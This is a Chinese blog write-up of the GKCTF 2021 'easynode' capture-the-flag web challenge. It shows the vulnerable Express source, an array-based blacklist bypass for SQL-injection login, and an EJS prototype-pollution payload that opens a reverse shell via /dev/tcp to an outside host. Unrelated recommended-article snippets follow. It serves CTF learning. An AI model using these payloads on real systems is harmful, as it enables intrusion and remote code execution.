[GKCTF 2021]easynode

最新推荐文章于 2023-07-05 00:13:08 发布
最新推荐文章于 2023-07-05 00:13:08 发布
阅读量1.7k 收藏 2
点赞数 3
CC 4.0 BY-SA版权
分类专栏: wp 文章标签: node.js javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/woshilnp/article/details/120316100
本文详细解析了一次通过弱类型转换和EJS模板引擎漏洞实现远程代码执行(RCE)的过程。首先,分析了应用的WAF过滤规则,利用数组弱类型特性绕过WAF,构造SQL注入,成功登录获取token。接着,通过添加特殊用户污染原型链,最终在/admin路由利用EJS渲染执行RCE。整个过程展示了Web安全中的常见攻击手段和防御绕过策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[GKCTF 2021]easynode

知识点:

js 弱类型

ejs 原型链污染

解题:

源码:

const express = require('express');
const format = require('string-format');
const { select,close } = require('./tools');
const app = new express();
var extend = require("js-extend").extend
const ejs = require('ejs');
const {generateToken,verifyToken}  = require('./encrypt');
var cookieParser = require('cookie-parser');
app.use(express.urlencoded({ extended: true }));
app.use(express.static((__dirname+'/public/')));
app.use(cookieParser());



let safeQuery =  async (username,password)=>{

    const waf = (str)=>{
        // console.log(str);
        blacklist = ['\\','\^',')','(','\"','\'']
        blacklist.forEach(element => {
            if (str == element){
                str = "*";
            }
        });
        return str;
    }

    const safeStr = (str)=>{ for(let i = 0;i < str.length;i++){
        if (waf(str[i]) =="*"){
            
            str =  str.slice(0, i) + "*" + str.slice(i + 1, str.length);
        }
        
    }
    return str;
    }

    username = safeStr(username);
    password = safeStr(password);
    let sql = format("select * from test where username = '{}' and password = '{}'",username.substr(0,20),password.substr(0,20));
    // console.log(sql);
    result = JSON.parse(JSON.stringify(await select(sql)));
    return result;
}

app.get('/', async(req,res)=>{
    const html = await ejs.renderFile(__dirname + "/public/index.html")
    res.writeHead(200, {"Content-Type": "text/html"});
    res.end(html)
})
    

app.post('/login',function(req,res,next){

    let username = req.body.username;
    let password = req.body.password;
    safeQuery(username,password).then(
        result =>{
            if(result[0]){
                const token = generateToken(username)
                res.json({
                    "msg":"yes","token":token
                });
            }
            else{
                res.json(
                    {"msg":"username or password wrong"}
                    );
            }
        }
    ).then(close()).catch(err=>{res.json({"msg":"something wrong!"});});
  })
 

app.get("/admin",async (req,res,next) => {
    const token = req.cookies.token
    let result = verifyToken(token);
    if (result !='err'){
        username = result
        var sql = `select board from board where username = '${username}'`;
        var query = JSON.parse(JSON.stringify(await select(sql).then(close())));  
        board = JSON.parse(query[0].board);
        console.log(board);
        const html = await ejs.renderFile(__dirname + "/public/admin.ejs",{board,username})
        res.writeHead(200, {"Content-Type": "text/html"});
        res.end(html)
    } 
    else{
        res.json({'msg':'stop!!!'});
    }
});
  
app.post("/addAdmin",async (req,res,next) => {
    let username = req.body.username;
    let password = req.body.password;
    const token = req.cookies.token
    let result = verifyToken(token);
    if (result !='err'){
        gift = JSON.stringify({ [username]:{name:"Blue-Eyes White Dragon",ATK:"3000",DEF:"2500",URL:"https://ftp.bmp.ovh/imgs/2021/06/f66c705bd748e034.jpg"}});
        var sql = format('INSERT INTO test (username, password) VALUES ("{}","{}") ',username,password);
        select(sql).then(close()).catch( (err)=>{console.log(err)}); 
        var sql = format('INSERT INTO board (username, board) VALUES (\'{}\',\'{}\') ',username,gift);
        console.log(sql);
        select(sql).then(close()).catch( (err)=>{console.log(err)});
        res.end('add admin successful!')
    }
    else{
        res.end('stop!!!');
    }
});


app.post("/adminDIV",async(req,res,next) =>{
    const token = req.cookies.token
    
    var data =  JSON.parse(req.body.data)
    
    let result = verifyToken(token);
    if(result !='err'){
        username = result;
        var sql ='select board from board';
        var query = JSON.parse(JSON.stringify(await select(sql).then(close()))); 
        board = JSON.parse(query[0].board);
        console.log(board);
        for(var key in data){
            var addDIV = `{"${username}":{"${key}":"${data[key]}"}}`;
            
            extend(board,JSON.parse(addDIV));
        }
        sql = `update board SET board = '${JSON.stringify(board)}' where username = '${username}'`
        select(sql).then(close()).catch( (err)=>{console.log(err)}); 
        res.json({"msg":'addDiv successful!!!'});
    }
    else{
        res.end('nonono');
    }
});



app.listen(1337, () => {
    console.log(`App listening at port 1337`)
})

大概看一下,最后我们其实就需要达到 extend 去原型链污染,而且存在 ejs 模板引擎,所以可以RCE,所以就需要获得 token 登录,最后在 /admin 路由进行渲染,打到RCE

var addDIV = `{"${username}":{"${key}":"${data[key]}"}}`;
            
            extend(board,JSON.parse(addDIV));

看到这里,我们就是想让{'__proto__':{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1\"');var __tmp2"}} 进行 extend 操作,

所以我们就需要让 username 等于 __proto,想要这样,就需要创建用户,就回到/addAdmin路由,所以我们就需要admintoken

回到最上面,

在这里插入图片描述

这里可以输出token,所以我们只需要登录成功就行,但是它对usernamepassword进行了WAF操作,我们就想进行绕过,核心代码:

let safeQuery =  async (username,password)=>{    // 过滤username和password中的危险字符并进行select查询
    const waf = (str)=>{
        // console.log(str);
        blacklist = ['\\','\^',')','(','\"','\'']
        blacklist.forEach(element => {
            if (str == element){
                str = "*";
            }
        });
        return str;
    }

    const safeStr = (str)=>{ for(let i = 0;i < str.length;i++){    // 配合 waf 函数将黑名单里的危险字符依次替换为 *
        if (waf(str[i]) =="*"){
            str =  str.slice(0, i) + "*" + str.slice(i + 1, str.length);
        }
    }
    return str;
    }
username = safeStr(username);
password = safeStr(password);
let sql = format("select * from test where username = '{}' and password = '{}'",username.substr(0,20),password.substr(0,20));

就是判断 username 和 password 的字符是否存在黑名单,存在转换成 * ,然后一看判断是 ==,可以使用弱类型绕过,即让username 为一个数组,这样 str[i] 就是一个键值,就直接绕过了WAF,但是这样的 username 还是一个数组啊,如何插入SQL语句中造成登录成功呢,

在 JS 中,如果将如果将两个数组相加,则最终数组将被转换成一个字符串:

在这里插入图片描述

因为WAF中存在拼凑操作,所以直接POST:

username[]=admin'#&username[]=1&username[]=1&username[]=1&username[]=1&username[]=1&username[]=1&username[]=1&username[]=1&username[]=(&password=123456

疑惑一:

为什么不能直接POST:username = [“admin’#”,1,1,1,1,1,1,1,1,1,’(’]&password=123456

。。。这不很简单吗,你没有将变量添加 [],浏览器就将它当作字符串了,后面这一串都被当成字符串了

疑惑二:

为什么 username 数组的长度需要一定长,没有达到一定长就无法成功登录

这样之后SQL语句就变成:

select * from test where username = 'admin'#,1,1,1,1,1,1,1,1,1*' and password = '123456'

因此 password 被注释了,所以直接就登陆了,然后回显 token ,

在这里插入图片描述

然后用次 token 去访问 /addAdmin 去创建用户:

在这里插入图片描述

然后获取 __proto__用户的 token ,然后用此 token 去POST data 数据污染

在这里插入图片描述

注意上面这里,需要对反弹 Shell 部分的命令进行 base64 编码避免一些控制字符的干扰。因为这里的POST方法发送的不是 JSON

然后访问 /admin 路由去渲染,进入 ejs 渲染引擎,触发RCE

在这里插入图片描述

EasyNodeAWF:一个简单的库有助于快速创建 [Alfred](http
06-24
使用 NodeJS 轻松创建阿尔弗雷德工作流 一个简单的库有助于使用 JavaScript 快速创建 Workflow! 请注意,此项目尚未完成,因此目前尚无法使用。 先决条件和安装## 首先,因为我们使用的是 JS,因此必须安装 NodeJS 您可以将插件放入 Alfred 然后修改它,或者通过以下方式创建新的工作流程: 转到Alfred Setting --> Workflow ,单击 + 按钮并添加一个空白工作流 添加输入-->脚本过滤器(基本上脚本过滤器在 alfred little tableview 中显示结果,而不是打开其他应用程序,您可以找到更多说明),随意命名关键字。 您可能会注意到脚本文本区域,我们将在步骤 5 中填写。 右键单击您刚刚创建的工作流,然后单击“在 Finder 中显示”,将项目复制到那里,执行 npm install。 写下您的命令,并在xx
推荐开源项目:ComfyUI-EasyNode - 舒适的UI框架与易用的节点系统
最新发布
gitblog_00046的博客
04-23 825
推荐开源项目:ComfyUI-EasyNode - 舒适的UI框架与易用的节点系统 去发现同类优质开源项目:https://gitcode.com/ 是一个由前端开发者创建的开源项目,旨在提供一套既美观又易于使用的用户界面(UI)框架和强大的节点操作系统。该项目的目标是简化Web应用开发过程,让开发者可以更专注于业务逻辑,而不是繁琐的UI实现。 技术分析 轻量级框架: ComfyUI-Easy...
Docker环境下部署Linux服务器ssh管理面板easynode
高性价比服务器就选:蓝易云
07-05 269
这将在后台运行EasyNode容器,并将容器的端口8080映射到主机的8080端口,同时将容器的SSH端口22映射到主机的22端口。您可以根据需要进行端口映射的调整。请注意,具体的步骤可能因您所使用的EasyNode版本和操作系统环境而有所不同。建议您参考EasyNode的官方文档或相关资源以获取更详细和准确的安装和配置说明。通过上述步骤,您可以在Docker环境下成功部署EasyNode面板来管理Linux服务器的SSH访问。
GKCTF2021-官方WriteUp.pdf
07-06
【标题】:GKCTF2021-官方WriteUp.pdf 【描述】:GKCTF2021-官方WriteUp.pdf 【标签】:wp writeup 这些标题和描述表明,文件是一份关于GKCTF2021(一个网络安全竞赛,CTF代表Capture The Flag)的官方攻略...
buu-[GKCTF 2021]QQQQT
qaq517384的博客
04-14 889
32位 Enigma Virtual Box 32位ida查看字符串 往下翻能找到base64密码表 可能因为Enigma Virtual Box的原因,函数都是wrong 没能看到密码表的边换过程 base一把梭,提交,成了! flag{12t4tww3r5e77} 预期解的话是 然后在看main函数就没有红字了(字符串的base表也消失了 int __thiscall sub_4012F0(_DWORD *this) { size_t v1; // ST0C_4 int v2; //
BUUCTF misc 专题(110)[GKCTF 2021]签到
tt_npc的博客
07-29 690
BUUCTF misc 专题(110)[GKCTF 2021]签到
CTF——MISC习题讲解(GKCTF 2021系列)
tlovejr的博客
03-04 6176
CTF——MISC习题讲解(GKCTF 2021系列) 前言 接下来陆续给大家复现一些赛事的杂项习题讲解,因为本人也是小白入门,有些题目做的不对还请各位大佬多多包涵。 一、[GKCTF 2021]签到 链接:https://pan.baidu.com/s/1rlBOLJMn-nYCsuyCT3eOSg?pwd=lfuj 提取码:lfuj 打开题目后是一个流量分析题目 然后我们看一下http协议,并追踪TCP流可以发现,在众多HTTP协议中,好像是执行Linux系统命令。 在这里进行了ls查看 在这里进行了
BUUCTF [GKCTF 2021]app-debug
weixin_53349587的博客
01-09 1079
1.拿到文件,发现是一个app,直接ida查看有没有so文件,有so文件,打开: 找到主函数,通过分析,找到关键函数,打开: 里面是一个典型的tea加密,只不过delta的值变了,所以用findcrypto也查不出来是tea加密,其中的key值也是假的,程序通过TracerPid进行反调试,详情请参考:TracerPid反调试 - 简书,然后通过对key值的交叉引用,找到了TracerPid所在的函数: 对付这种反调试的方法是把TracerPid的值改为0,于是打开39行sub_3EF..
easynode-js-old:一个关于easynode的旧项目
07-13
易节点 node.js 的网站
easynode系统中的数据采集服务.zip
01-03
使用go开发的项目源码、数据集
菜鸟初学 node 推荐 亲测easy
weixin_30586085的博客
06-17 96
链接 首推:------- > : https://www.runoob.com/nodejs/nodejs-tutorial.html node 安装教程 ------ > https://www.runoob.com/nodejs/nodejs-install-setup.html node 创建应用 ----- >ht...
【EASYDOM系列教程】之Node介绍
weixin_33840661的博客
07-24 111
DOM 的标准规范中提供了 Node 对象,该对象主要提供了用于解析 DOM 节点树结构的属性和方法。 Node 对象的作用 DOM 树结构主要是依靠节点进行解析,称为 DOM 节点树结构。Node 对象是解析 DOM 节点树结构的主要入口。 Node 对象提供的属性和方法,可以实现遍历节点、插入节点和替换节点等操作。而这些操作也正是我们...
EasyNode Linux 服务器管理面板
lzhdim的专栏
02-21 256
软件简介 EasyNode 是一个简易的个人 Linux 服务器管理面板 (webSSH&webSFTP)。 功能简介 多服务器管理。通过 websocket实时更新服务器基本信息:系统、公网 IP、CPU、内存、硬盘、网卡等 基于浏览器解决 SSH&SFTP跨端烦恼 ——Web SSH&Web SFTP 在线编辑文件 ...
[GKCTF2021]easycms
Anton__1的博客
07-16 1705
[GKCTF2021]easycms 扫到admin.php 官方提示了,后台密码为5位数字的, 盲猜账号admin密码12345 登录到后台 点击:设计->导出主题->保存 然后复制下载的主题的链接 http://caf73c4b-734b-495b-b898-dc46661beb7f.node4.buuoj.cn/admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2R
[GKCTF 2021]easycms
weixin_48083470的博客
07-02 1042
[GKCTF 2021]easycms 复现 提示后台5位弱口令 进入admin.php页面 试得为 admin 12345 发现可以对网页编辑 保存的时候发现需要权限 在微信这里存在目录穿越 将原始ID 编辑成路径穿越的漏洞 随便上传张jpg图片 回到编辑页面 这个 ?> 一定要加上 不然代码失效 可以看到幻灯片被替换成了 代码 编辑代码 拿到flag ...
CTF向 nodejs入门【持续更新】
weixin_51458899的博客
02-23 3054
ctf向 nodejs入门
【五一创作】在Docker环境下部署Linux服务器ssh管理面板easynode
jks212454的博客
04-30 1533
【五一创作】在Docker环境下部署Linux服务器ssh管理面板easynode
[gkctf 2021]rrrrsa
06-28
### 回答1: [gkctf 2021]rrrrsa 是一道RSA加密相关的题目,需要解密出明文。具体的解题思路可以参考以下步骤: 1. 首先,我们需要获取到题目中给出的公钥和密文。公钥包括两个参数:n和e,密文为c。 2. 接下来,我们需要对公钥进行分解,得到p和q两个质数。可以使用工具或算法进行分解,比如使用yafu等工具。 3. 然后,我们可以计算出phi(n) = (p-1) * (q-1)。 4. 接着,我们需要求出d,即私钥。可以使用扩展欧几里得算法求解,也可以使用工具进行计算。 5. 最后,我们可以使用私钥d对密文c进行解密,得到明文m。 具体的实现过程可以参考RSA加密算法的原理和实现方法。需要注意的是,在实际的CTF比赛中,可能会对RSA加密算法进行一些变形或者加入一些附加条件,需要根据具体情况进行调整和处理。 ### 回答2: [gkctf 2021]rrrrsa 是 2021GKCTF信息安全比赛中的一道题目。这是一道RSA算法的题目,题目中给定了两个密文和两个公钥,要求参赛者求出明文。 要解决这道题目,需要对RSA算法有一定的了解,RSA算法是目前公认比较安全的加密算法之一,其基本原理是利用大数的分解难题来实现加密和解密。 在这道题目中,给出了两个密文和两个公钥,首先需要利用公钥将密文解密得到明文,然后用相应的算法求解出两个私钥。在RSA算法中,私钥的求解需要知道两个质数p和q,故需要对公钥进行分解并求出其中的两个质数。一旦求出两个私钥,则可用私钥解密密文得到明文。 在这道题目中,给出的密文是以十六进制表示的大数,而公钥是由两个大质数乘积构成的。根据RSA算法的基本原理,通过对密文使用公钥进行解密,即可得到明文,但需要注意的是,密文和公钥都需要进行处理,才能保证它们能够正确地被计算机所处理。 因此,参赛者需要熟练地掌握RSA算法的原理及应用,同时还需要具备一定的计算机处理能力,才能够成功地解决这道[gkctf 2021]rrrrsa的挑战。 ### 回答3: [gkctf 2021]rrrrsa是一道RSA密码学题目,在这道题目中,我们需要通过分解RSA公钥中的N来找到是否存在两个相同的质因数,从而破解RSA加密的密文,获得明文。 首先,我们可以通过给定的公钥N、e和密文c,利用RSA加密算法求出c的解密结果m。但是,这样显然并不是题目要求我们做的事情,因为我们无法知道RSA公钥中的质数。 那么,如何判断公钥中是否存在两个相同的质数呢?我们可以利用RSA加密算法的一个性质:当我们选择两个质数p和q,然后对它们进行乘法运算得到N时,我们再进行分解N时能得出的两个质数就是p和q。 因此,我们可以对给定的公钥N进行分解得到它的质数因子p和q,如果存在两个质因子相等,则说明存在两个相同的质数,这就意味着我们可以破解RSA加密的密文。 具体地说,在这道题目中,我们可以利用Python的gmpy2工具库中的下列函数来分解公钥N: gmpy2.factor(n) 接着,我们可以利用Python脚本进行以下步骤: 1. 读入给定的公钥N,调用函数factor分解出p和q; 2. 计算φ(N) = (p-1)*(q-1); 3. 计算d = e^-1 mod φ(N); 4. 调用Python库中的pow函数计算c^d mod N,得到明文m。 最后,我们就能够通过这些步骤,破解出RSA加密的密文c,获得明文m,完成这道[gkctf 2021]rrrrsa的挑战。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值